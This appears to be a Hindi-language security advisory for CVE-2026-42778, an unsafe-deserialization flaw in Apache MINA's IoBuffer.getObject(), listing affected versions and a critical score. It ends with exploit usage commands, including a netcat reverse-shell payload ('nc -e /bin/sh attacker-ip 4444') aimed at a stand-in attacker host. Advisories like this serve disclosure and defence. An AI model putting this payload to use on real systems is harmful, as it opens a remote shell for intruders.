
CVE-2026-42778 EUVD-2026-26492 अविश्वसनीय डेटा का डिसीरियलाइज़ेशन (CWE-502)
Apache MINA के AbstractIoBuffer.getObject() विधि में अधूरा सुधार। क्लासनेम अनुमतिसूची सत्यापन जो यह प्रतिबंधित करता है कि कौन सी क्लासें डिसीरियलाइज़ की जा सकती हैं, बहुत देर से लागू किया जाता है, पढ़ी जा रही क्लासों में स्टैटिक इनिशियलाइज़र पहले ही निष्पादित हो चुके होते हैं। ऐसा इसलिए होता है क्योंकि CVE-2024-52046 के लिए मूल सुधार 2.1.X और 2.2.X शाखाओं पर ठीक से लागू नहीं किया गया था। प्रभावित संस्करण: - Apache MINA 2.1.0 से 2.1.11 - Apache MINA 2.2.0 से 2.2.6
CVE ID: CVE-2026-42778
प्रकाशित: 05/01/2026
प्रभाव: गंभीर
एक्सप्लॉइट उपलब्धता: सार्वजनिक नहीं, केवल निजी।
CVSS: 9.8
पैच उपलब्ध: (अभी तक कोई आधिकारिक पैच नहीं)
एक हमलावर दुर्भावनापूर्ण सीरियलाइज़्ड ऑब्जेक्ट बना सकता है, जिन्हें IoBuffer.getObject() द्वारा संसाधित करने पर, क्लासनेम अनुमतिसूची सत्यापन होने से पहले स्टैटिक इनिशियलाइज़र के माध्यम से मनमाना कोड निष्पादित होता है। चूँकि यह एक नेटवर्क-सुलभ भेद्यता है जिसके लिए किसी विशेषाधिकार या उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं होती, Apache MINA का उपयोग करने वाले किसी भी एप्लिकेशन के लिए जो IoBuffer.getObject() विधि को कॉल करता है, रिमोट कोड निष्पादन संभव है। यह भेद्यता प्रभावित सिस्टम की गोपनीयता, अखंडता और उपलब्धता से पूर्ण समझौता करने की अनुमति देती है।
# कंपाइल और जनरेट करें
javac ExploitGenerator.java
java ExploitGenerator "nc -e /bin/sh attacker-ip 4444"
# ObjectSerializationCodecFactory का उपयोग करके MINA-आधारित सेवा पर नेटवर्क के माध्यम से भेजें
# या किसी भी एंडपॉइंट पर जो IoBuffer.getObject() को कॉल करता है